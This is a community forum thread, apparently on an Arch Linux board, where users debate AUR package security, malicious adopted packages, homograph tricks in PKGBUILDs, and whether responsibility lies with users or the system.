That’s what I’ve always found surprising that so many popular up voted packages in the AUR haven’t made it to the default Arch repos. I actually recently found out that mullvad-vpn has made it to the extra repo.
Which wasn’t there last time I used Mullvad, so I thought it would be a good occasion to renew another year.
I also found that out some weeks ago. So I switched to the extra package.
BTW, as someone on the AUR mailing list pointed out, reading the PKGBUILD won’t really save you either, since there are homograph attacks (mostly non-latin characters that look like latin characters, or I vs l depending on your font.) And then what I already mentioned, a new line may look perfectly valid. Oh, it installs an npm package now? OK, but now what? Do I read the npm package to find out what it’s doing? How far down the rabbit hole are users expected to go?
TL;DR: I think blaming users for not being diligent enough is a lazy answer. There’s always more you could do.
If you have the slightest suspicion, you should do it. Or at least try as much as you can.
I didn’t know that. Thanks for pointing this out.
I think not accepting responsibility of YOUR system and blaming others for not taking YOUR system into consideration is a YOU problem and not a DEVELOPER problem.
Well earlier in this topic I placed a link about this.
Didn’t recognize it. Too many answers to read … 
Well, yes, but how far does that responsibility have to go for one to admit that the system itself is pretty faulted too when it comes to security? It’s a slippery slope on both sides of the argument in my eyes to solely accuse the user OR solely accuse the system itself.
He was very persistent & dogmatic in his arguments. The concept of “agreeing to disagree” was alien to him. He took this approach with the forum moderators as well as us humble members.
The final straw was the decision by the moderators to turn on the filter for some swearwords, following requests by some users. Despite the forum being a public space and not a private one, 
saw this as despicable and entirely contrary to his own cherished notion of free speech. The moderators eventually tired of his persistence & dogmatism on this issue and suspended him.
Too late if I may give my unasked HO on the matter. But you know as they say:
Better Late Than Sorry
Perhaps the key is to have a break?
I agree its a faulted system but at the end of the day its still YOUR responsibility for YOUR System. As a User I can’t understand the pains a Developer would need to go through to Understand and Compliment everyone’s unique setup/situation.
The fact is that this is an OPEN SOURCE Project and if you don’t like the way its currently being done then please by all means create a new system with a less flawed design. If you build it they will come.
May it extends its break into the retirement 
… including STDs. You have succinctly described the problem. 
Looking at the fact that the problem is mostly from orphaned packages that get adopted by newly created user accounts it seems there should be a bit more control and restriction on new AUR user accounts in some form or something similar with auditing. What that workable form for that looks like the Arch devs and community will have to think of something and having read the most recent mails from the aur-general mailinglist that what’s happening right now or at least there’s brainstorming being done about this now.
You know that xkcd comic about standards? Yeah, let’s not do it unless there is no middle ground that can be found at all in regards to solving this.
Yes, it’s the user’s responsibility to make sure their system doesn’t get infected, but I don’t think it’s reasonable to expect them to spend more than 15 minutes or so to determine if a package from the AUR has malware or not. There’s also a skill issue that needs to be addressed and seemingly no one wants to make it, at least to some degree, easy for new comers by explaining what to look for in PKGBUILD, but maybe I am wrong here.
Either way, this conversation is going in circles it seems. I don’t think it’s worth me regurgitating what I already said.
That happens entirely too often (and no I mean in general, not you). I am a firm believer in less is more and succinct speech. if you can’t say it in a paragraph, then it’s a skill issue.
No I don’t know what this is. But yes agree to disagree.
